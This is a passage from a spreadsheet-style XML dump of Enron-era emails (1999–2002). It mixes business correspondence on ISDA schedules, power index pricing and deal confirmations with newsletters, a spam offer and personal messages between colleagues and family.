 Members and Member Firms have (10) days from the date of this notice to=20_x000D_
advise the Corporate Secretary=01,s Office of any claims in accordance with=_x000D_
 Rule=20_x000D_
2.51._x000D_
_x000D_
 Inquiries regarding the above should be addressed to the Member Services=_x000D_
=20_x000D_
Department (212) 299-2379._x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=3Dtana.jones@enron.com&amp;=_x000D_
refdo_x000D_
c=3D(MS-17)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 22:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CCT VAR</t>
  </si>
  <si>
    <t>EFF_DT PORTFOLIO_ID DOWN95_x000D_
1/22/01  MANAGEMENT-COAL 2,951._x000D_
1/22/01  MANAGEMENT-CRD 0_x000D_
1/22/01  MANAGEMENT-GAS 1,305,566._x000D_
1/22/01  MANAGEMENT-PWR 319,063._x000D_
1/22/01  AGG-MANAGEMENT 1,435,626.</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 08:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: am</t>
  </si>
  <si>
    <t xml:space="preserve">I ate at the Met, so I had a big lunch.  Fridge foraging is fine._x000D_
_x000D_
I would get the stone delivered as early as possible, so that I can pace _x000D_
myself.  Bob said he ordered 1700 pounds, if I am remembering correctly.  _x000D_
Guess I should go look._x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 02/12/2001 04:34:07 PM_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
To: &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: am_x000D_
_x000D_
Wow, I just got this message..._x000D_
I think we should put the camera out of reach before there's no more film..._x000D_
I think we should call and have some stone delivered on the 19th. or even_x000D_
this Saturday. How much do you think we need?_x000D_
I'm glad your not sore and I think you are doing a great job with the yard._x000D_
Eat out of the frig tonight? I'm thinking a sausage wrap and tater_x000D_
tots...Love, NM_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Monday, February 12, 2001 11:17 AM_x000D_
To: nmann@erac.com_x000D_
Subject: am_x000D_
_x000D_
_x000D_
Good morning,_x000D_
_x000D_
Just checking in.  Michael and I had a good morning.  No weird outfits_x000D_
today.  Figures, since I now have a camera ready to go._x000D_
_x000D_
So what do you think about the stone thing? I like the way Bob's front yard_x000D_
looks._x000D_
_x000D_
I'm not sore today, but then again, I didn't do all that much.  Our yard is_x000D_
looking better, though._x000D_
_x000D_
Hope you are having a good day._x000D_
_x000D_
Love,_x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 06:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ISDA Schedule for Enron-EWEB Transactions</t>
  </si>
  <si>
    <t>----- Forwarded by Sara Shackleton/HOU/ECT on 11/06/2000 02:21 PM -----_x000D_
_x000D_
	Jim Deason &lt;Jdeason@chbh.com&gt;_x000D_
	11/03/2000 03:14 PM_x000D_
		 _x000D_
		 To: "Sara Shackleton (E-mail)" &lt;sara.shackleton@enron.com&gt;_x000D_
		 cc: "Dick Varner (E-mail)" &lt;Dick.Varner@eweb.eugene.or.us&gt;, "Bert Dunn _x000D_
(E-mail)" &lt;bert.dunn@eweb.eugene.or.us&gt;, "Scott Spettel (E-mail)" _x000D_
&lt;scott.spettel@eweb.eugene.or.us&gt;_x000D_
		 Subject: ISDA Schedule for Enron-EWEB Transactions_x000D_
_x000D_
_x000D_
Sara -- Thanks for the voicemail.  Attached is EWEB's proposed Schedule for_x000D_
the Single Currency ISDA.  Perhaps we can arrange a time Monday afternoon to_x000D_
discuss?  -Jim_x000D_
_x000D_
_x000D_
 &lt;&lt;ISDA - EWEB Schedule for Enron.doc&gt;&gt;_x000D_
_x000D_
 - ISDA - EWEB Schedule for Enron.doc</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 16:06:17 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'winbigstuff@customoffers.com'})</t>
  </si>
  <si>
    <t>Free membership offer for great new deals</t>
  </si>
  <si>
    <t>Patrice, _x000D_
Announcing CustomOffers.com Newest Partnership! A Free membership offer from WinBigStuff.com! _x000D_
As a new WinBigStuff.com member, you will receive special offers and great deals on the topics that interest you. _x000D_
Your enrollment in WinBigStuff.com affords you many FREE opportunities to receive valuable offers and services.  You will automatically begin receiving email offers from various companies to help you better manage your busy life. _x000D_
And best of all, it's FREE of charge! _x000D_
Search no more! Finally, a newsletter that delivers the Internet to you! WinBigStuff.com will keep you up to date with our email notifications. _x000D_
These subscriptions require us to share some information about you, such as your e-mail address, in order for the partner to fulfill your request. _x000D_
Sincerely, _x000D_
The CustomOffers.com Team _x000D_
If you have any questions about the WinBigStuff.com Service please view the WinBigStuff   Privacy Policy:  http://www.winbigstuff.com/privacy.htm_x000D_
If you do not want to receive special offers and great deals, click here  or copy and paste this URL into your browser: http://web1.customoffers.com/click.asp?lnk=2627&amp;email=PMIMS@ENRON.COM _x000D_
_x000D_
Your privacy is extremely important to us. You requested to receive this mailing, by registering at CustomOffers.com or by subscribing through one of our marketing partners. As a leader in permission-based email marketing, we are committed to delivering a highly rewarding experience, with offers that include bargains, entertainment, and  money-making ideas. However, if you wish to unsubscribe, click here  or link to http://web1.customoffers.com/unsubscribe.asp?emid=1485&amp;email=PMIMS@ENRON.COM. Third-party offers contained in this email are the sole responsibility of the offer originator. [IMAGE]</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 02:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Financial Analysts' Reports for 10.11.00</t>
  </si>
  <si>
    <t>Please open the attached file to read the complete text of the following_x000D_
items:_x000D_
_x000D_
07:21AM EDT 11-OCT-00 UBS WARBURG (US) (CHARLIE WOLF) AAPL CPQ EMC GTW_x000D_
2000/3 PREVIEW_x000D_
_x000D_
08:21AM EDT 11-OCT-00 SALOMON SMITH BARNEY (JOHN C. DEAN) SEG HDD_x000D_
SEG: UPSIDES QUARTER ON STRONG DEMAND FROM ENTERPRISE CUSTOMERS_x000D_
_x000D_
09:14AM EDT 11-OCT-00 BOFA MONTGOMERY (WHITTINGTON, RICHARD L) INTC_x000D_
MICROPROCESSOR FORUM_x000D_
_x000D_
05:49AM EDT 11-OCT-00 MERRILL LYNCH (J.OSHA) AMD_x000D_
ADVANCED MICRO:AMD CALL_x000D_
_x000D_
12:18PM EDT 10-OCT-00 BUCKINGHAM RESEARCH GROUP  (STEVENS, JAY P.)_x000D_
HWP-STRONGBUY-STRUCTURE OF PWC DEAL COULD CHANGE;4Q APPEARS ON TRACK_x000D_
_x000D_
 &lt;&lt;10.11.00 Analyst Reports.doc&gt;&gt;_x000D_
_x000D_
The analyst reports provided are reports prepared by independent analysts_x000D_
who monitor and track Compaq's performance.  These reports are not prepared_x000D_
by or at the direction of Compaq and as a result, Compaq is not endorsing or_x000D_
verifying the information contained in these reports or endorsing any of_x000D_
these analysts.   These reports are being provided solely for business_x000D_
reasons and as a result, do not distribute these reports to other_x000D_
individuals outside of Compaq.  If other individuals are interested in_x000D_
receiving the reports provided herein, please contact Elizabeth Davis in_x000D_
Compaq's Investor Relations Department at elizabeth.davis@compaq.com._x000D_
_x000D_
_x000D_
Elizabeth Davis_x000D_
Compaq - Investor Relations_x000D_
Research Analyst_x000D_
281-518-4289_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - 10.11.00 Analyst Reports.doc</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 09:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Assignment for Thursday</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks.  See you tomorrow._x000D_
_x000D_
_x000D_
_x000D_
	"Vavrek, Carolyn (US - San Francisco)" &lt;cvavrek@deloitte.com&gt;_x000D_
	04/04/2001 03:43 PM_x000D_
		 _x000D_
		 To: Jeff.Dasovich@enron.com_x000D_
		 cc: _x000D_
		 Subject: RE: Assignment for Thursday_x000D_
_x000D_
i think there is no prep 4 thurs_x000D_
those other asgnts were dropped_x000D_
hope u had fun in mexico _x000D_
thanks 4 the files_x000D_
- cv_x000D_
_x000D_
Carolyn M. Vavrek_x000D_
Manager - Human Capital Advisory Services_x000D_
Deloitte &amp; Touche_x000D_
50 Fremont Street_x000D_
San Francisco, CA  94105_x000D_
_x000D_
phone: 415-783-5137_x000D_
fax: 415-783-8760_x000D_
e-mail: cvavrek@deloitte.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
Sent: Wednesday, April 04, 2001 10:27 AM_x000D_
To: Jeff.Dasovich@enron.com_x000D_
Cc: Anil Sama; Vavrek, Carolyn (US - San Francisco);_x000D_
Jeff.Dasovich@enron.com; Jeff_Dasovich@enron.com; Mark Guinney_x000D_
Subject: Assignment for Thursday_x000D_
_x000D_
_x000D_
_x000D_
Greetings:_x000D_
_x000D_
Are we supposed to do the reading and the Oracle and Legal Services cases_x000D_
for Thursday?  Syllabus says yes, but I gather from Tasker's Izio not that_x000D_
we'll be in the computer center all class doing modeling.  (I'd email her,_x000D_
but she doesn't get my emails apparently.)  Anyone have a clue?_x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
This message (including any attachments) contains confidential information_x000D_
intended for a specific individual and purpose, and is protected by law.  If_x000D_
you are not the intended recipient, you should delete this message and are_x000D_
hereby notified that any disclosure, copying, or distribution of this_x000D_
message, or the taking of any action based on it, is strictly prohibited._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 09:51:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>too bad about pavel.  everybody liked him.. .who's next in line?</t>
  </si>
  <si>
    <t>Tue, 28 Dec 1999 00:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Dad's schedule</t>
  </si>
  <si>
    <t>Why don't you guys try Pappa's Steakhouse?  It's about $20 - $30 a plate.</t>
  </si>
  <si>
    <t>Mon, 12 Jun 2000 09:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>*** Monthly Update ***</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 06/12/2000 _x000D_
04:30 PM ---------------------------_x000D_
_x000D_
_x000D_
"FT.com" &lt;ft.com.update@newsbyemail.ft.com&gt; on 06/06/2000 03:51:57 PM_x000D_
To: "FT.com User":;_x000D_
cc:  (bcc: Vince J Kaminski/HOU/ECT)_x000D_
Subject: *** Monthly Update ***_x000D_
_x000D_
_x000D_
_x000D_
------------------------Advertisement--------------------------_x000D_
Get qualified Internet Business data from exclusive research at_x000D_
TheStandard.com's Intelligence Store. Visit today to learn more_x000D_
about formulating solid e-business strategies.The best Internet_x000D_
research, all in one place._x000D_
_x000D_
http://ads14.focalink.com/SmartBanner/page?16801.1_x000D_
---------------------------------------------------------------_x000D_
_x000D_
_x000D_
Dear FT.com user_x000D_
_x000D_
This month, it's the soccer in Europe, Fathers' Day in the States,_x000D_
and wireless on the way at FT.com. To keep at the competitive edge,_x000D_
read on and then connect._x000D_
_x000D_
_x000D_
1. News by E-mail service enhanced_x000D_
2. Investment research made easy_x000D_
3. Want to know more about Wireless?_x000D_
4. US news from a global perspective_x000D_
5. FT.com launches FTSE 100 discussions_x000D_
6. Forgotten Fathers?_x000D_
_x000D_
_x000D_
----------------------------------_x000D_
1. News by E-mail service enhanced_x000D_
----------------------------------_x000D_
Subscribers to the top five industry sectors of FT.com's free_x000D_
News by E-mail service now receive "The World Press Digest" too -_x000D_
the most important business stories from the leading press titles_x000D_
around the world.  Get the international perspective on he big_x000D_
business stories as you wake. You know the world doesn't just turn_x000D_
on a dime - so keep ahead of what's important in the world's_x000D_
business centres - quickly, easily and direct to your desktop._x000D_
http://www.ft.com/nbe_x000D_
_x000D_
--------------------------------_x000D_
2. Investment research made easy_x000D_
--------------------------------_x000D_
FT.com's Interactive Charting Tool is a great place to carry out_x000D_
investment research, producing informative charts to analyse_x000D_
stock performance._x000D_
http://www.marketprices.ft.com/ftpages/mp_bigchartOKIE.htm_x000D_
_x000D_
------------------------------------_x000D_
3. Want to know more about Wireless?_x000D_
------------------------------------_x000D_
Visit our discussion forums dedicated to the wireless industry_x000D_
Wireless Open Forum - discuss any issues you like - the floor_x000D_
is yours!_x000D_
http://forum.ft.com/fintimes/Forum94/HTML/000001.html_x000D_
_x000D_
------------------------------------_x000D_
4. US news from a global perspective_x000D_
------------------------------------_x000D_
So who says it's a big business story?  If you want the global_x000D_
perspective on US business news, FT.com will deliver it before_x000D_
breakfast._x000D_
http://www.ft.com/nbe_x000D_
_x000D_
---------------------------------------_x000D_
5. FT.com launches FTSE 100 discussions_x000D_
---------------------------------------_x000D_
FT.com's online discussions have recently been relaunched with_x000D_
a range of new features. We've also introduced individual_x000D_
discussions for each of the FTSE 100 companies. So you can now_x000D_
discuss topics related to a company with like-minded individuals_x000D_
and market experts._x000D_
http://www.ft.com/forums/ftse100_x000D_
_x000D_
---------------------_x000D_
6. Forgotten Fathers?_x000D_
---------------------_x000D_
In case your diary, PDA, or SMS alert hasn't already reminded you,_x000D_
June 18th is Fathers Day and we've got some exciting gifts at_x000D_
special promotional rates.  You could also win a pair of digital_x000D_
gadgets including palm sized computers and digital cameras._x000D_
http://timeoff.ft.com/ft/gx.cgi/ftc?pagename=View&amp;c=Collection&amp;cid=IXLSH0EP76C_x000D_
_x000D_
_x000D_
Regards,_x000D_
FT.com_x000D_
_x000D_
_x000D_
--------------------------------------------------------------_x000D_
_x000D_
Why not forward this e-mail to a friend or colleague who may_x000D_
find this information useful?_x000D_
_x000D_
If you no longer wish to receive further e-mails from us_x000D_
please send an e-mail to ft.com.unsubscribe@newsbyemail.ft.com_x000D_
with the single word "unsubscribe" as the subject of the_x000D_
message. Your name will then be removed from our mailing_x000D_
list._x000D_
_x000D_
If you have forgotten your password for ft.com simply visit:_x000D_
http://registration.ft.com/registration/passwordLookup.jsp_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 13:20:47 -0800 (PST)</t>
  </si>
  <si>
    <t>what is the except becky stuff all the time._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, November 20, 2001 3:16 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
i dont know everybody else is, except becky_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, November 20, 2001 3:13 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
why are you asking me that?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, November 20, 2001 3:12 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
howcome you didnt make fun of my yellow shirt today_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, November 20, 2001 3:12 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
Heath Bar!!!!!  for the butt!!!  :)</t>
  </si>
  <si>
    <t>Thu, 6 Apr 2000 05:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Alliance netback worksheet</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 04/06/2000 _x000D_
12:18 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Julie A Gomez                           04/01/2000 07:11 AM_x000D_
	_x000D_
_x000D_
To: Hunter S Shively/HOU/ECT@ECT, Phillip K Allen/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Alliance netback worksheet_x000D_
_x000D_
Hello Men-_x000D_
_x000D_
I have attached my worksheet in case you want to review the data while I am _x000D_
on holiday._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Julie  :-)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 00:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.harp@elpaso.com'})</t>
  </si>
  <si>
    <t>Hey Kim,_x000D_
_x000D_
Here is my resume in case anything comes up. It was good to finally see you._x000D_
We've been keeping up with you through the Nolans. I hope you can make it_x000D_
Sunday. My number over here is 713-420-4703 in case you need any more info._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bob_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;RESUME3.doc&gt;&gt;_x000D_
_x000D_
_x000D_
******************************************************************_x000D_
This email and any files transmitted with it from the_x000D_
ElPaso Corporation are confidential and intended solely_x000D_
for the use of the individual or entity to whom they are_x000D_
addressed. If you have received this email in error_x000D_
please notify the sender._x000D_
******************************************************************_x000D_
_x000D_
 - RESUME3.doc</t>
  </si>
  <si>
    <t>Thu, 18 Jan 2001 05:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Follow Up</t>
  </si>
  <si>
    <t xml:space="preserve">We need to get the signed copy._x000D_
_x000D_
_x000D_
_x000D_
	Paul Goddard@ENRON_x000D_
	01/18/2001 01:22 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Kal Shah/HOU/ECT@ECT, Amita Gosalia/LON/ECT@ECT, Michael _x000D_
Schuh/FRA/ECT@ECT_x000D_
		 Subject: Re: Follow Up_x000D_
_x000D_
VWD is actually NOT an EnronOnline agreement so it's  important everyone _x000D_
realizes this. It was signed by Chris McKey , formerly head of Enron _x000D_
Frankfurt office and , presumably by VWD.  We are simply going to be using _x000D_
the existing agreement (which does not mention EnronOnline whatsoever), since _x000D_
it generically allows us to use their news on ANY  single Enron website we _x000D_
choose (does not restrict us).  As such is it necessary to have the copy _x000D_
signed by VWD ?  I would have thought that the important signature was the _x000D_
Enron signature since we are paying them for a service , not vice versa._x000D_
_x000D_
All other agreements related to EnronOnline this side of the Atlantic are _x000D_
pending (non-executed) to the best of my knowledge. _x000D_
_x000D_
 Michael - do you know of any other signed agreements that specifically _x000D_
relate to EnronOnline in Germany?  _x000D_
_x000D_
The only other one that has possibly been signed is an agreement with a _x000D_
company called IMP that Nick Mooney arranged for some sort of outsourced _x000D_
direct marketing work for EnronOnline (suspect this is very small potatoes _x000D_
but will find out).   However, I'd suggest you contact Kal Shah - he may know _x000D_
about this agreement if it does in fact exist._x000D_
_x000D_
_x000D_
_x000D_
From: Tana Jones@ECT on 18/01/2001 12:46 CST_x000D_
To: Paul Goddard/EU/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Follow Up_x000D_
_x000D_
Is VWD the only agreement you have currently signed on that side of the _x000D_
Atlantic?_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 21:16:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shawne@harmony.com'})</t>
  </si>
  <si>
    <t>frozenset({'evmba_social@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>RE: Cal Basketball Game - Jan. 19th</t>
  </si>
  <si>
    <t xml:space="preserve">It would probably help if I let you all know by when.  Let's say by Friday_x000D_
(December 21st).  So, I will get tickets for those who respond by 6:00pm_x000D_
Friday, Dec. 21st._x000D_
_x000D_
Again Happy Holidays!!  _x000D_
_x000D_
-- Shawne_x000D_
_x000D_
Sorry 2nd years I didn't realize you had the MPAR that same weekend.  You_x000D_
can count on another one in February._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Shawne Robinson_x000D_
To: evmba_social@haas.berkeley.edu_x000D_
Sent: 12/17/01 2:15 PM_x000D_
Subject: Cal Basketball Game - Jan. 19th_x000D_
_x000D_
Hello All, _x000D_
_x000D_
If you're like me and you've never been to one sporting event during_x000D_
your time at Cal, here's your chance (if you have, come along for the_x000D_
company).  For those interested, please join me on Jan. 19th. @ 5:00pm_x000D_
when Cal will take on Washington State.  The tickets look like they are_x000D_
$24.50 per person.  If you are interested, please let me know, so I can_x000D_
try to get a block of seats together.  _x000D_
_x000D_
Happy Holidays!! _x000D_
_x000D_
All the best, _x000D_
_x000D_
-- Shawne </t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 11:18:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'suzanne.vann@enron.com'})</t>
  </si>
  <si>
    <t>FW: FOOTBALL</t>
  </si>
  <si>
    <t xml:space="preserve">This makes 8_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cowan, Beth  _x000D_
Sent:	Wednesday, November 28, 2001 1:18 PM_x000D_
To:	Ward, Kim S (Houston)_x000D_
Subject:	RE: FOOTBALL_x000D_
_x000D_
sounds fun, thanks for the invite - i'll be there_x000D_
_x000D_
Beth Cowan_x000D_
Enron Freight Markets_x000D_
Phone: 713-853-9868_x000D_
Fax: 713-853-6061_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ward, Kim S (Houston)  _x000D_
Sent:	Tuesday, November 27, 2001 5:17 PM_x000D_
To:	'Terri.Hamby@ElPaso.com'; Cowan, Beth; Vann, Suzanne; Ward, Kim S (Houston); Nemec, Gerald; Gerard, Camille; Cross, Edith; Black, Troy; Smith, Mark; McCaffrey, Deirdre; Slone, Jeanie; Arnold, John; Arnold, Matthew; Olinger, Kimberly S.; Capestany, Mari; Wheeler, Rob; French, Joe; Herron, Chris; Brewer, Stacey J.; Melissa Reese (E-mail); 'mkammer@tradespark.com'; Susie LeJune (E-mail); Sally McElroy (E-mail); Brad Fagan (E-mail); Elizabeth Jordan (E-mail); John Schilke (E-mail); Fuller, Dave_x000D_
Subject:	FOOTBALL_x000D_
_x000D_
 &lt;&lt; File: VS.doc &gt;&gt; _x000D_
_x000D_
Suzanne, _x000D_
_x000D_
can you forward to Lori and Joe Gordon._x000D_
_x000D_
Terri, _x000D_
_x000D_
Can you forward to Pierce, Stacy, and Donna?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Jun 2000 05:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'blake.lasuzzo@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Blake,_x000D_
Thanks for the email.  I will work on it.  I am out for the next several _x000D_
weeks, S America (today), Korea and Japan in the next 2 weeks.  If I don't _x000D_
follow-up after that, please email me again._x000D_
_x000D_
Thanks for the kind words._x000D_
mike_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Blake Lasuzzo @ ENRON                           06/05/2000 03:23 PM_x000D_
	_x000D_
_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Mr. McConnell,_x000D_
_x000D_
I am an Energy Management major at OU who is interning here at Enron.  My _x000D_
work experience so far has been excellent, and nothing less than what I had _x000D_
hoped for.  I have had the opportunity to hear you speak a few times in _x000D_
Norman and have been very impressed.  I have been impressed by the things you _x000D_
said about this company and its ideals, programs and its commitment to _x000D_
excellence - all of which I have seen since I started work.  The most _x000D_
impressive thing to me, however, were the things you said about positive _x000D_
thinking, goal setting, and the power of the subconscious mind in your talk _x000D_
with the J.C. Penney Leadership Program.  These are beliefs which I have been _x000D_
raised on by my father, and really believe to be true.  It was very _x000D_
inspirational to hear that type of message from someone else for whom it has _x000D_
obviously worked.  As I have started my internship here, I am implementing _x000D_
this psychology into my life and work ethic, and thought you would might have _x000D_
some helpful advice.  I know you are an extremely busy man, but I decided to _x000D_
send you an email and ask if you ever had a few free minutes in which I could _x000D_
speak with you about how this way of thinking has positively impacted your _x000D_
career.  If you ever have a few minutes of free time this summer, I would _x000D_
really appreciate the opportunity to speak with you._x000D_
_x000D_
Thank you for your time_x000D_
_x000D_
Blake Lasuzzo_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 18 Mar 2001 22:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Amanda,_x000D_
_x000D_
Can you put this file in the appropriate directory, and create the necessary _x000D_
link under the "Testing" tab of the fundamentals website.  It should be _x000D_
called Kern Expansion Economics".  I don't have a description yet (and I'm _x000D_
still working on the other one I owe you).  Let me know if you have any _x000D_
questions.  Thanks._x000D_
_x000D_
Mat_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 08:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wendy.king@enron.com'})</t>
  </si>
  <si>
    <t>Introduction to Downstream Origination</t>
  </si>
  <si>
    <t xml:space="preserve">Richard,_x000D_
_x000D_
Per our conversation please find attached a brief introduction to Downstream _x000D_
Originations, the crux of our efforts, and a contact list._x000D_
We continue to benefit from increased contact with your staff, and look _x000D_
forward to working together on more projects._x000D_
_x000D_
Kindly amend if necessary and distribute to all concerned.  I have confirmed _x000D_
to Ginger that I am available to make a presentation at your June 8/9 meeting _x000D_
as well._x000D_
_x000D_
Regards,_x000D_
_x000D_
Wendy King_x000D_
X35814_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 01:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PX Index Deal 253768</t>
  </si>
  <si>
    <t xml:space="preserve">Bob -_x000D_
Val was looking into this deal, but now that she's gone I wonder if you could _x000D_
help me with it. It's a swap that was done on 10/18/99 between LTWM and EES. _x000D_
It's an off-peak deal for 0.2 mw at a price of $23.00 and settlement index of _x000D_
PX SP-15. There are five legs that each run for one year - Cal'05 through _x000D_
Cal'09. _x000D_
_x000D_
I understand you've been working on making the switch from PX to Dow Jones _x000D_
indices. Do you know anything about this deal and whether or not its index _x000D_
needs to be changed? Please let Melissa or me know._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 03/13/2001 09:35 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Melissa Ann Murphy_x000D_
03/13/2001 08:29 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: deal # 253768_x000D_
_x000D_
Have you had a chance to look into this?_x000D_
_x000D_
Thanks,_x000D_
Melissa_x000D_
---------------------- Forwarded by Melissa Ann Murphy/HOU/ECT on 03/13/2001 _x000D_
09:25 AM ---------------------------_x000D_
_x000D_
_x000D_
Melissa Ann Murphy_x000D_
03/08/2001 04:58 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: deal # 253768_x000D_
_x000D_
Hello, I noticed that deal # 253768 is an index deal with EES that has not _x000D_
been changed from the CAL PX to the Dow Jones index.  Could you ask Valerie _x000D_
or Bob Badeer if this deal should be changed?  I was going to send them a _x000D_
revised confirm._x000D_
_x000D_
Thanks!_x000D_
Melissa_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 09:31:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'celeste.cisneros@enron.com', 'diane.anderson@enron.com', 'sanjeev.khanna@enron.com', 'brent.hendry@enron.com', 'dianne.seib@enron.com', 'eduardo.gil@enron.com', 'vivek.kumar@enron.com'})</t>
  </si>
  <si>
    <t>FW: Power Demand w/ECC - EOL</t>
  </si>
  <si>
    <t xml:space="preserve">Before we get too far along in redrafting the Alberta Power Pool pricing index, I have some thoughts on the discussion below.  _x000D_
_x000D_
The first point that should be kept in mind is that the Index language provided to you originally by Dianne Seib (which I have reproduced again below) is the language currently used in ECC's physical and financial power transactions in Alberta and has wide-spread industry acceptance.  I do not believe that rewriting it is in the best interests of ECC, even if it is just for transactions between ECC and RMT, as inconsistency, particularly what could be significant inconsistency, between the calculation of pricing could cause problems with ECC's ability to properly manage its position as well as regarding accounting and operational matters.  _x000D_
_x000D_
Also, I am unclear as to how the original language provided to you by Dianne Seib is not specific enough to get someone to the specific pricing reference.  In Alberta, we have always referenced the "Actual/Forecast" pricing table as opposed to the "Historical" pricing table and if the URL that is referenced in the original description provided to you by Dianne Seib is inserted into your internet browser it takes you directly to the "Actual/Forecast" table.  Then, the column and row references set forth in the original description take you to the specific price point.  Therefore, I am unclear as to how the previous description provided by Dianne Seib is not specific enough to get you to the actual price point.  As far as using the "Actual/Forecast" table as opposed to the "Historical" table, I believe that both tables get you to the same point, given that, by the end of each day, the "Actual/Forecast" table sets forth the actual pricing for each hour of that day.  _x000D_
_x000D_
In addition, I do not believe that it is correct to use a price averaged over the day as opposed to the actual price for each hour during the day (as is contemplated in the original description).  Perhaps it is different when using the index for weather derivatives, but, when entering into power swaps or physical power buy/sells, it is essential to use the actual price for each hour rather than an average because (a) the determination period is each hour, not each day, and (b) more importantly it is very common to have a power product that only relates to certain hours of a day (ie. non-peak hours or peak hours) or has a term of less than one day, in which case a daily average would be unacceptable.  _x000D_
_x000D_
Finally, it is necessary to include the language "provided that the Floating Price shall be corrected to reflect any "Pool Price Errors" as may be posted on such web page, or otherwise communicated, from time to time by the Power Pool of Alberta" at the end of the description to deal with any pricing errors posted by the Power Pool.  _x000D_
_x000D_
Just to ensure we are talking about the same language, the current language in use in Alberta for the Alberta Power Pool Index is as follows:_x000D_
_x000D_
